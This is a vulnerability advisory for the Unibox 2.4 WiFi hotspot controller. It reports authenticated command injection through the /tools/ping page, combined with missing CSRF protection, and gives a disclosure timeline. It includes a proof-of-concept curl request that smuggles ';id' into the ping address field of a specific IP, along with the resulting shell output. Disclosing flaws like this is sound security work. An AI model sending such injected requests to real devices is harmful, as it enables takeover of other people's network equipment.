===================================================== Authenticated Remote Code Execution In Unibox 2.4 ===================================================== . contents:: Table Of Content Overview ======== Title:- Authenticated command execution in all UNIBOX WiFi Hotspot Controller. CVE ID:- Not Yet Assign Author: Kaustubh G. Padwad Vendor: Wifi-soft (https://www.wifi-soft.com/) Products: 1.Unibox SMB 2.UniBox - Enterprise Series 3.UniBox - Campus Series Tested Version: Unibox U-50 | UniBox 2.4 (Respetive for others) Severity: Critical Advisory ID ============ KSA-Dev-009 About the Product: ================== UniBox is one of the most innovative and reliable Hotspot Controllers in the market today. You can install UniBox to manage any sized WiFi network without having to replace any existing infrastructure. With UniBox, you don't need any other solution for managing WiFi access. It comes packed with features so just one box is enough to handle all the functions of WiFi hotspots. Description: ============ An issue was discovered on Unibox SMB with Unibox 2.4 and poterntially respected all other devices. There is Code Execution vulnerability via /tools/ping Function in device which leads to complete device takeover. Additional Information ====================== The page /tools/ping can be tricked via specially crafted request which will leads to the code execution on device also device does not validate the csrftoken,hence By combining this two attack we can form the Authencated remote code execution on device leads to complete device takeover. [Vulnerability Type] ==================== Remote Code Execution (RCE) Cross Site Request Forgery (CSRF) How to Reproduce: (POC): ======================== curl -i -s -k -X $'POST' \ -H $'Host: 136.232.224.22' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://136.232.224.22/tools/ping' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 25' -H $'Connection: close' -H $'Cookie: PHPSESSID=k4l9or0l5xxxxxxxxxxx' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=k4l9oxxxxxxxxxx' \ --data-binary $'pingaction=1&address=1;id' \ $'http://136.232.224.22/tools/ping' Sample OutPut -------------


 Ping Status
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Affected Component] /tools/ping ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] once victim open the crafted url the device will get compromise Mitigation ========== Reported to vendor yet no reponse recived Disclosure: =========== 08-JAN-2020 Discoverd the Vulnerability, and Reported via contact form 20-JAN-2020 Vendor responded via call xxxxxxxxxxx No communication recived furter Hence disclosing under responsible discloser [Vendor of Product] WiF-Soft (http://https://www.wifi-soft.com/company/about.php) credits: ======== * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://s3curityb3ast.github.io/ * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad